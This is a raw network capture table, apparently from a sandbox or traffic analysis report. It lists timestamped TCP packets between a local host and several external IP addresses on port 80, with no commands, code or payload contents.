Nov 5, 2024 07:11:40.742587090 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.742613077 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.742640972 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.742690086 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.742698908 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.742866039 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.742866039 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.743107080 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743115902 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743155003 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.743329048 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743346930 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743356943 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743370056 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.743397951 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.743694067 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743709087 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743720055 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.743752003 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.774739027 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.774785995 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.774796963 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.774802923 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.774934053 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.774935007 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.863908052 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.863928080 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864028931 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.864042044 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864051104 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864093065 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.864171028 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864181042 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864191055 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864217043 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.864603996 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864614010 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864624023 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864644051 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.864661932 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.864976883 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.864995956 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.865004063 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.865047932 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.899868011 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.899878025 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.899888039 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.899951935 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.900016069 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.900026083 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.900207043 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.988033056 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988045931 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988055944 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988095999 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.988193035 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988204002 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988214970 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988224983 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988235950 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.988260031 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.988343000 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.988384008 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.989092112 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.989103079 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.989109993 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.989137888 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.017313004 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.017323971 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.017334938 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.017344952 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.017390013 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.017461061 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.017630100 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.017668962 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.017810106 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.060873985 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.106437922 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.106481075 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.106560946 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.106623888 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.106633902 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.106642008 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.106647015 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.106657982 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.106683969 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.107433081 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.107485056 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.107580900 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.107589960 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.107599974 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.107611895 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.107620955 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.107650042 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.138622046 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.138632059 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.138717890 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.138784885 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.138794899 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.138804913 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.138816118 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.138834000 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.138856888 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.139230967 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.139398098 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.139431953 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.228926897 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.228939056 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.228949070 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.228998899 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.229079008 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229089975 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229099989 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229125977 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.229144096 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.229381084 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229404926 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229433060 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229444027 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.229444027 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229455948 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229466915 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.229477882 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.229497910 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.260027885 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.260044098 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.260056019 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.260065079 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.260076046 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.260097980 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.260230064 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.304393053 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.304457903 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.304486036 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.304495096 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.304506063 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.304572105 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.349083900 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349095106 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349104881 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349142075 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.349168062 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349190950 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.349203110 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349214077 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349237919 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.349580050 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349597931 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349607944 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.349613905 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.349632978 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.380884886 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.380896091 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.380906105 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.380939007 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.381220102 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.381230116 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.381242037 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.381253004 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.381356001 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.381356001 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.381606102 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.381613970 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.381647110 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.425730944 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.425766945 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.425776005 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.425892115 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.425892115 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.470251083 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470261097 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470280886 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470289946 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470372915 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.470455885 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470509052 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470518112 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470525026 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.470546961 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.470873117 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470881939 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.470913887 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.471050024 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.471059084 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.471092939 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.502119064 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.502190113 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.502196074 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.502206087 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.502226114 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.502392054 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.502402067 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.502441883 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.502465010 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.502619028 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:41.502661943 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.507121086 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:41.511888027 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:56.563430071 CET	49737	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:56.568248034 CET	80	49737	188.114.96.3	192.168.2.4
Nov 5, 2024 07:11:56.568314075 CET	49737	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:56.577744961 CET	49737	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:56.582715988 CET	80	49737	188.114.96.3	192.168.2.4
Nov 5, 2024 07:11:58.092036009 CET	49737	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:58.098059893 CET	80	49737	188.114.96.3	192.168.2.4
Nov 5, 2024 07:11:58.098104954 CET	49737	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:59.110552073 CET	49739	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:59.142704010 CET	80	49739	188.114.96.3	192.168.2.4
Nov 5, 2024 07:11:59.142771959 CET	49739	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:59.151470900 CET	49739	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:11:59.156261921 CET	80	49739	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:00.654540062 CET	49739	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:00.659972906 CET	80	49739	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:00.660037994 CET	49739	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:01.680821896 CET	49741	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:01.685852051 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.685935020 CET	49741	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:01.710527897 CET	49741	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:01.715431929 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715451956 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715461969 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715497971 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715507984 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715518951 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715528011 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715545893 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:01.715555906 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:03.191755056 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:03.191767931 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:03.191788912 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:03.191801071 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:03.191807985 CET	49741	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:03.191812992 CET	80	49741	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:03.191842079 CET	49741	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:03.217195034 CET	49741	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:04.237610102 CET	49756	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:04.242497921 CET	80	49756	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:04.242562056 CET	49756	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:04.258071899 CET	49756	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:04.262871981 CET	80	49756	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:05.751194954 CET	80	49756	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:05.751610041 CET	80	49756	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:05.751698971 CET	49756	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:05.752975941 CET	80	49756	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:05.753017902 CET	49756	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:05.754266024 CET	49756	80	192.168.2.4	188.114.96.3
Nov 5, 2024 07:12:05.759291887 CET	80	49756	188.114.96.3	192.168.2.4
Nov 5, 2024 07:12:10.781478882 CET	49791	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:10.786462069 CET	80	49791	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:10.786560059 CET	49791	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:10.800744057 CET	49791	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:10.805665970 CET	80	49791	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:11.438564062 CET	80	49791	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:11.438628912 CET	49791	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:12.310955048 CET	49791	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:12.315771103 CET	80	49791	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:13.391069889 CET	49807	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:13.395900011 CET	80	49807	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:13.395967007 CET	49807	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:13.420289993 CET	49807	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:13.425157070 CET	80	49807	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:14.042479992 CET	80	49807	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:14.042587042 CET	49807	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:14.935808897 CET	49807	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:14.942445993 CET	80	49807	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:15.992563963 CET	49822	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:15.997409105 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:15.997519970 CET	49822	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:16.032826900 CET	49822	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:16.037734032 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037864923 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037873983 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037921906 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037933111 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037940979 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037967920 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037978888 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.037981987 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.646637917 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:16.646708012 CET	49822	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:17.545147896 CET	49822	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:17.550228119 CET	80	49822	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:18.704123020 CET	49837	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:18.710469961 CET	80	49837	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:18.710565090 CET	49837	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:18.726574898 CET	49837	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:18.731661081 CET	80	49837	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:19.336869955 CET	80	49837	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:19.337639093 CET	80	49837	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:19.337686062 CET	49837	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:19.339566946 CET	49837	80	192.168.2.4	3.33.130.190
Nov 5, 2024 07:12:19.344362020 CET	80	49837	3.33.130.190	192.168.2.4
Nov 5, 2024 07:12:24.760071039 CET	49874	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:24.764842987 CET	80	49874	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:24.764935970 CET	49874	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:24.774723053 CET	49874	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:24.779586077 CET	80	49874	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:25.765630007 CET	80	49874	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:25.810847044 CET	49874	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:25.954705954 CET	80	49874	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:25.954756021 CET	49874	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:26.279596090 CET	49874	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:27.300918102 CET	49889	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:27.306114912 CET	80	49889	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:27.306202888 CET	49889	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:27.317367077 CET	49889	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:27.322248936 CET	80	49889	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:28.268071890 CET	80	49889	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:28.310941935 CET	49889	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:28.447379112 CET	80	49889	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:28.447587967 CET	49889	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:28.826457024 CET	49889	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:29.846297026 CET	49903	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:29.851138115 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.851229906 CET	49903	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:29.866767883 CET	49903	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:29.871702909 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871712923 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871740103 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871747971 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871759892 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871767044 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871809959 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871817112 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:29.871936083 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:30.864532948 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:30.904519081 CET	49903	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:31.061400890 CET	80	49903	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:31.061460018 CET	49903	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:31.373356104 CET	49903	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:32.391474962 CET	49917	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:32.396289110 CET	80	49917	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:32.396377087 CET	49917	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:32.402347088 CET	49917	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:32.407263041 CET	80	49917	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:33.579181910 CET	80	49917	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:33.579430103 CET	80	49917	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:33.579444885 CET	80	49917	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:33.579483986 CET	49917	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:33.579483986 CET	49917	80	192.168.2.4	154.23.184.95
